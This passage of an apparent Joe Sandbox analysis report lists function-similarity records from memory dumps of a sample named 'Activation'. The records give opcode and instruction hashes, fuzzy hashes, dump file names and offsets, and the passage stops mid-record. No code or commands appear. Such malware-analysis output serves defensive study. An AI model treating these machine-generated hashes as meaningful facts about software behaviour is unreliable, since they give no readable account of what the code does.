                                                                                        • Opcode ID: 26e30ac7cad4bdadc6c1a796239fb237f930a13ebbe983d7f9077c97e0a4004f
                                                                                        • Instruction ID: 586f4fc939804ef8a690ae0b2081b1d3f8ea9a6935e44b4e0e8f4910b4ff19fb
                                                                                        • Opcode Fuzzy Hash: 26e30ac7cad4bdadc6c1a796239fb237f930a13ebbe983d7f9077c97e0a4004f
                                                                                        • Instruction Fuzzy Hash: 9731C2B5D0021D9FDB00CFAAD888BDEFBB4FB48314F14842AE918A7250D7749A55CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 65124ed76bb4c82eacf6f99e72030667ae8039312cf227a3a551495a48aafeec
                                                                                        • Instruction ID: e68773fe9626a6ed161d2ed90ac0b619fb58da31ca45f4d938c8b86eacb0c6a4
                                                                                        • Opcode Fuzzy Hash: 65124ed76bb4c82eacf6f99e72030667ae8039312cf227a3a551495a48aafeec
                                                                                        • Instruction Fuzzy Hash: EC219031B101158FDB44EB78D8A466E77E6FB85750B508078D51AD3391EF34DC06D7A1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1f934c4bd63dd198412c91e78a720a7173dd471568e9ca2d4887a9a0d9538981
                                                                                        • Instruction ID: de130f8c1d7387a1eea5b91e77f3413ce1656454597e70c398416a3636d6eaf6
                                                                                        • Opcode Fuzzy Hash: 1f934c4bd63dd198412c91e78a720a7173dd471568e9ca2d4887a9a0d9538981
                                                                                        • Instruction Fuzzy Hash: 6221CD31B001158FDB44EB78D8A8A6E7BE6FB89750B508078D51AD3390EF34DC06EBA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1647696098.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c0d000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b4cd2e21ea621a2a39b171568380cbb6037547485d7699498548aa96a85be146
                                                                                        • Instruction ID: 34ff396fa3f1174ed431b7bb968d707c5a0678a8f2ca026e718ddb1f0ddde313
                                                                                        • Opcode Fuzzy Hash: b4cd2e21ea621a2a39b171568380cbb6037547485d7699498548aa96a85be146
                                                                                        • Instruction Fuzzy Hash: 0721D471504344DFDB04DF94D5C4B26BB65FB84314F24C5ADD80A4B296C776DC46CA62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1647696098.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c0d000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ee955c3bfb440deae0a604e18e702a6d6d5a8a5a072512b10fffd3724f381e80
                                                                                        • Instruction ID: 60550cb39c9771599d7fec62dad23d4c47dddfcf087d1624b3a0ba4cc911610a
                                                                                        • Opcode Fuzzy Hash: ee955c3bfb440deae0a604e18e702a6d6d5a8a5a072512b10fffd3724f381e80
                                                                                        • Instruction Fuzzy Hash: 2B21F375604344EFDB10DF54D9C0B2ABB65FB84328F34C569D90A4B2C6C73AD846CAA2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dae1bb9395433edf6a74166a0194402e8242c05912e04dcf6a08505576afdc16
                                                                                        • Instruction ID: d5a3f2772998854bb798a97a76de78425cdc767832163742906146d2719680b7
                                                                                        • Opcode Fuzzy Hash: dae1bb9395433edf6a74166a0194402e8242c05912e04dcf6a08505576afdc16
                                                                                        • Instruction Fuzzy Hash: 14213730A00209DBDF14DFA9E999BADB7B1FF89304B20816ED406AB350DF759D06CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2d5e2b1a8b4414edd2e5f747e3abb52effd38967b1ec634d5b569e172bcaf483
                                                                                        • Instruction ID: 7e2ba2be870dac3a869bbd0f3cf8b11dbd9ffcb394e4f4281827675182b0b015
                                                                                        • Opcode Fuzzy Hash: 2d5e2b1a8b4414edd2e5f747e3abb52effd38967b1ec634d5b569e172bcaf483
                                                                                        • Instruction Fuzzy Hash: 9821D530F0421A4FDB05AB7998152BF7BB6DFC6211F10416AD909E7280EF314D468791
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1659397203.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6160000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6faa602f755c229574bd0e27103f4546eae4347a8b4c74b3d2fea153ff080d3c
                                                                                        • Instruction ID: bad33fd3847e654ce74efa567ff15d128de0078a37d3a18c07aa0ee651f259af
                                                                                        • Opcode Fuzzy Hash: 6faa602f755c229574bd0e27103f4546eae4347a8b4c74b3d2fea153ff080d3c
                                                                                        • Instruction Fuzzy Hash: 15217931B002188FDB84EB79D5647AE7BF6AF8D215F24042CE102AB3A1DF349C41CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6b4bad51c7f303876a26f0392b8f303ea0d6db47b6232ef1622b4fc2786a0595
                                                                                        • Instruction ID: 7eb7855719d8257d21bc11aa1e89bccfe166414d19a4bd79dccaa42248d80548
                                                                                        • Opcode Fuzzy Hash: 6b4bad51c7f303876a26f0392b8f303ea0d6db47b6232ef1622b4fc2786a0595
                                                                                        • Instruction Fuzzy Hash: 71217271B00108DFCF41DFADD9859AEBBF5FBC8710B10802AE519E7211DB319D159BA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2e1387d03366dc56437a33326a9497a3e9fa6b38c57ea363c9b8bc24d9ccce30
                                                                                        • Instruction ID: c278163514cba0d4ec4c566ee469f41c87bf277dd6cf591cce37f7d5a7fe4bf3
                                                                                        • Opcode Fuzzy Hash: 2e1387d03366dc56437a33326a9497a3e9fa6b38c57ea363c9b8bc24d9ccce30
                                                                                        • Instruction Fuzzy Hash: 2B110331B012468FDF15DBB4D8646BE7BB1EF82714B1045BAD009E7142DF345E0AC7A1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1659397203.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6160000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 340136337c116f7c21b8a85c145681506f3e1a30af909f318418202931da1a2e
                                                                                        • Instruction ID: 4fa2da0b22a5cb9cc25e89eabd9294d3944685a4e47d87f0a12ff264c98455c6
                                                                                        • Opcode Fuzzy Hash: 340136337c116f7c21b8a85c145681506f3e1a30af909f318418202931da1a2e
                                                                                        • Instruction Fuzzy Hash: 9A219A34A01219CFDB98EB75C9587AE76F2AF8D305F200528E006AB3A1EF359C01CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1659397203.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6160000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 12fa74754463213f45142624d571ed57678c4b7496a53d8f9d4fe3034545a98b
                                                                                        • Instruction ID: aab23cd3d3e822b0a6dcfc50ea7c762c4ab01e93d2e3751d2d49c97b9ff56b86
                                                                                        • Opcode Fuzzy Hash: 12fa74754463213f45142624d571ed57678c4b7496a53d8f9d4fe3034545a98b
                                                                                        • Instruction Fuzzy Hash: 0621DEB8AA13489FF7069B21E45AA2D7B66F788355F80842AF9618B3C4DF7D4C01CF10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5d8e5cbe71f7c769c1fff6fd8b9e375d1681a6f0c259dbe7634d7359cb947801
                                                                                        • Instruction ID: 6a6f673c518091bde5399128d0534a244ee9cae74dc7e8fcba2f71c372529de6
                                                                                        • Opcode Fuzzy Hash: 5d8e5cbe71f7c769c1fff6fd8b9e375d1681a6f0c259dbe7634d7359cb947801
                                                                                        • Instruction Fuzzy Hash: 1C11D6227401144FDB49F3BDA86167E22E7ABC6660B69407AD009CB3D5DE648C0363E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3a617d41cabf6916d17f88c520efd3f1f60be0b850f95826beb5455a42320953
                                                                                        • Instruction ID: 5a0b4ba6ff8d4d450bb2bb7efadd80c14fc5ff57a50a222edea77b0b36e1d83a
                                                                                        • Opcode Fuzzy Hash: 3a617d41cabf6916d17f88c520efd3f1f60be0b850f95826beb5455a42320953
                                                                                        • Instruction Fuzzy Hash: 89112231B042908FDB15AB78942476E7BE1AF82310F28C5EBD0598F2D2CB358C46C391
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e9b3389924c0857131a259b55dba85191928c955f8a50d6f954af53c3ab30ab1
                                                                                        • Instruction ID: 3179ee5bfb66a7baede58513b76bcfd1f00e3baad5f4ee9bc4c063d1765f29de
                                                                                        • Opcode Fuzzy Hash: e9b3389924c0857131a259b55dba85191928c955f8a50d6f954af53c3ab30ab1
                                                                                        • Instruction Fuzzy Hash: EC11E432B10218CFCF05EF60E865AAD77B2FB85311B0442A9D845A7260DF356D05CBD1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 780a24b304f6107d3b88e0893d7dcb2b0ecdf6b5e064bc45a94144669f7d07e6
                                                                                        • Instruction ID: 7c29c99b02fa153629b4e4476ce1f2276e2c2d0a7ec0231ac21b21754ae5545a
                                                                                        • Opcode Fuzzy Hash: 780a24b304f6107d3b88e0893d7dcb2b0ecdf6b5e064bc45a94144669f7d07e6
                                                                                        • Instruction Fuzzy Hash: 06117C71E062099FCF45DBF8E8946EDBBF1EB89310F1441AAD419E7251EB319901CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1659397203.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6160000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 126952bd07f32620e74d96ef9dd75422c56be492160781786c8cf4195da13314
                                                                                        • Instruction ID: ea28676fdb4a3564623c7e6e51fb1a5b725e05c0275170b8e5a76816b3db2d74
                                                                                        • Opcode Fuzzy Hash: 126952bd07f32620e74d96ef9dd75422c56be492160781786c8cf4195da13314
                                                                                        • Instruction Fuzzy Hash: 9311EE34A01218CFDF98EB74C9153AE76F2AF89241F200438E402AB291EF358C01CB92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ad7da114034c46b60247b5606d575b821c067c9b6d48fbef61c107d8ec93bf47
                                                                                        • Instruction ID: 7a093d8b7803783560a8a692b32a8de91e9ecc4dd56a50f960ba590c1955a929
                                                                                        • Opcode Fuzzy Hash: ad7da114034c46b60247b5606d575b821c067c9b6d48fbef61c107d8ec93bf47
                                                                                        • Instruction Fuzzy Hash: 4B110432B053544BDB1AEB39846876E7BE69FC5720718486AD805DF381DE75DC418394
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be6669926d7fdeb5c19f166adf87760ec47177790a4b5d894db92fc4f6ad968a
                                                                                        • Instruction ID: f479f8e3dfb8df22d97e2412fb1aa0027beacde64d8fe8d85e4c9b134f393b98
                                                                                        • Opcode Fuzzy Hash: be6669926d7fdeb5c19f166adf87760ec47177790a4b5d894db92fc4f6ad968a
                                                                                        • Instruction Fuzzy Hash: 9B211A74A10254EFDF14DB65D898BAEBBB5BF89710F148068E806A7291CF705849CBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1659397203.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6160000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0e2ec3bbed57542784a1cce0704de6604b3fcc4dc2766ded86a82eff1740b52b
                                                                                        • Instruction ID: 07f078254f67b3cac43d39a97657fcd969ca10ca282963998af3035c1e283015
                                                                                        • Opcode Fuzzy Hash: 0e2ec3bbed57542784a1cce0704de6604b3fcc4dc2766ded86a82eff1740b52b
                                                                                        • Instruction Fuzzy Hash: 0921CFB8A912489FF7469B21E44AA2D7B67F788351F90842EF9614B3C4DE7D4C01CF10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e56a827c84266e7138ce6607c5c4b0cca17e592a99547cd1ea08e69b8d2bfe74
                                                                                        • Instruction ID: 84d1e547a392d40b038239f2c3dc24acef9edfddd9ecc9ce035c8c45619643b9
                                                                                        • Opcode Fuzzy Hash: e56a827c84266e7138ce6607c5c4b0cca17e592a99547cd1ea08e69b8d2bfe74
                                                                                        • Instruction Fuzzy Hash: 6E110A71B102099BDB04DBA4D951BEEB7B9AF89710F284059E441EB384DA71AE05CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 069da937f4092bc2f244a1b27c6d7c5a31c454eeb8bf626fa0ee7a46fa48d6c6
                                                                                        • Instruction ID: 56f86ddd2cacce65898c4978aa3a5b65b30c773578d40f43775fae8720b3d461
                                                                                        • Opcode Fuzzy Hash: 069da937f4092bc2f244a1b27c6d7c5a31c454eeb8bf626fa0ee7a46fa48d6c6
                                                                                        • Instruction Fuzzy Hash: 1A110231B052068FDF15DBA8D9556AE77E2EFC5300B10826AE415EB340EF34EE0A8B81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c96487243d13f5cf51ffec6dd597c0540db053262d28cfd540ecb4521ccd62ee
                                                                                        • Instruction ID: 915332212f587916b2b3accf517deb2682a24f963352504e89212338637b38fd
                                                                                        • Opcode Fuzzy Hash: c96487243d13f5cf51ffec6dd597c0540db053262d28cfd540ecb4521ccd62ee
                                                                                        • Instruction Fuzzy Hash: F8114674D04208EFDB18CFA9D5949ADBBB2EF89700F20C5A9C80597345E7349E86EB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1647696098.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c0d000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b337c43fdee072dd6506580c32272ecff2640d26b568c34a64d99e7abc220164
                                                                                        • Instruction ID: 1739535e7f6712eb4418ab8427afd08c66504b7cbfb1f7278ab32ed1ec826e41
                                                                                        • Opcode Fuzzy Hash: b337c43fdee072dd6506580c32272ecff2640d26b568c34a64d99e7abc220164
                                                                                        • Instruction Fuzzy Hash: 51119D75504280DFCB05CF54D6C4B15BFA1FB84318F28C6AAD84A4B696C33AD94ACF62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1647696098.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c0d000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6565910dd8fbc32553e6be0cfac3ae464c0556e9afacfea56911ccb9cd4cbb0d
                                                                                        • Instruction ID: cb1af84b3fe0b857308eb7912f7fbba4f3a7ab0f284b325e87911811715d48dc
                                                                                        • Opcode Fuzzy Hash: 6565910dd8fbc32553e6be0cfac3ae464c0556e9afacfea56911ccb9cd4cbb0d
                                                                                        • Instruction Fuzzy Hash: 1C11B275504284DFCB11CF50D9C4B5AFB71FB84324F28C6AAD84A4B686C33AD946CF51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3b4aa685a6ed6de74356763d9ea56078933ad5e322d1a68c2bc307ac8b5b6f78
                                                                                        • Instruction ID: a3cc3b833fa32dce8bcc7d13a5d466c17d59c3e60e64cde9fd3ba0892dff663f
                                                                                        • Opcode Fuzzy Hash: 3b4aa685a6ed6de74356763d9ea56078933ad5e322d1a68c2bc307ac8b5b6f78
                                                                                        • Instruction Fuzzy Hash: 79012432A05205CFCF51CBA8ED011EAF7F0FF842647148ABBC56ED3600E3319A168B80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fbf32e429c441090c063a606c7cc8585afef0f726fb8d22434baf93abb760217
                                                                                        • Instruction ID: aa3b1805e284f3100fcca651e5c8c388668eb81d60225e31ba915e3256a670b2
                                                                                        • Opcode Fuzzy Hash: fbf32e429c441090c063a606c7cc8585afef0f726fb8d22434baf93abb760217
                                                                                        • Instruction Fuzzy Hash: 3801B571F152189FDF44EBB8D8546AE7BF5EB8A360F5000AAD449E3341EF358D0187A1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6df78a3a896e851ac7d847df6c314cdf0ae73490b099620b8d34376f6aa18fc1
                                                                                        • Instruction ID: b888d9951cad1271c1e92ba3a4725ceb28bb9936e05ce6af8e5d06b9872fe8e8
                                                                                        • Opcode Fuzzy Hash: 6df78a3a896e851ac7d847df6c314cdf0ae73490b099620b8d34376f6aa18fc1
                                                                                        • Instruction Fuzzy Hash: 560125B1B043048FDB049F55D88576A7BA5FBC8711F10857AE90C9F285DAB1DD09CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5ba5a94c1ad9ef6e57c9e9bf9d0cc135720eb3931ed8ea137e7f42b5b1d9fa2c
                                                                                        • Instruction ID: e6dce00f66f179f746974447ab4dd4e7f240e7e3f2d9070f11428830d4c0d2fc
                                                                                        • Opcode Fuzzy Hash: 5ba5a94c1ad9ef6e57c9e9bf9d0cc135720eb3931ed8ea137e7f42b5b1d9fa2c
                                                                                        • Instruction Fuzzy Hash: 1401B132710229CBCF05AB74E8246ED33B2FB89310B444669D442A73A0DF796D05CBE5
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0e24589da816bf5136cd52558f3b3e2fa03aa686baa4a5a37183f11936b3f59d
                                                                                        • Instruction ID: d24812c866f2501e63b8de40b495aaf08565d632e815e224e06079e627cdd83e
                                                                                        • Opcode Fuzzy Hash: 0e24589da816bf5136cd52558f3b3e2fa03aa686baa4a5a37183f11936b3f59d
                                                                                        • Instruction Fuzzy Hash: B6E01270A0510DEFCB00DFB4E941AADB7F1EB45204B1042AED809D3251DA711F14EB41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9db5edb27ccad41f11d5a43a97dd9f6b1857d756023ca349908b28d2936b53c1
                                                                                        • Instruction ID: 8cd7d9088b2e48d8e263f1eb718693408aa2b73784ee8fa1552a2c84fee6eeb9
                                                                                        • Opcode Fuzzy Hash: 9db5edb27ccad41f11d5a43a97dd9f6b1857d756023ca349908b28d2936b53c1
                                                                                        • Instruction Fuzzy Hash: E1D05B70A0010DEFCB00DFB4ED41A5DB7F5EB45214B1042AAD808D3201DA315F10EB41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb51b1c6c18b58e93bcb4271e21d7abf484ebe72b1daa24ab3895c75e8a04958
                                                                                        • Instruction ID: b0ac1da77cab2516c0ae159432a534146454dda8d382af186902f5037901b9b7
                                                                                        • Opcode Fuzzy Hash: fb51b1c6c18b58e93bcb4271e21d7abf484ebe72b1daa24ab3895c75e8a04958
                                                                                        • Instruction Fuzzy Hash: 0AD012327512189BD644B679F861A7D379EF7827A0F500065E5099B281DD951C0163D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ff0bad1f9c92bf2d65ecf75a94e1fe8b7c08a8e5608ca14a00e2a7343f2f4c1d
                                                                                        • Instruction ID: 5fbc4536d8329dc23c8b2e0f979bc7449895065afc87a159b0fe46526a9f58bb
                                                                                        • Opcode Fuzzy Hash: ff0bad1f9c92bf2d65ecf75a94e1fe8b7c08a8e5608ca14a00e2a7343f2f4c1d
                                                                                        • Instruction Fuzzy Hash: 3ED023317511544FD744A238B861A7D2B95F782350F10016DE0059B281CDC00C0167C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0b989662e4f9e920f2693c8aaa2da013939651c104db05346377744bca0e9b92
                                                                                        • Instruction ID: d37f72d2011a2d4dbb904b375f64bece483828695d1cd1f1f5d9d264a1ea18b2
                                                                                        • Opcode Fuzzy Hash: 0b989662e4f9e920f2693c8aaa2da013939651c104db05346377744bca0e9b92
                                                                                        • Instruction Fuzzy Hash: 8CE0E27061021AEBEF209B58E99DBEDBB71FF45704F20042EE102AA2A0DBB80940CB41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0987a12eb894b8dcc48d69a492d29d1331a050aeead64a6dd51d1fe983787283
                                                                                        • Instruction ID: d3b072380bf2301d99d6420239d0ddd062bcd9770903606dc3f78f2396786a7f
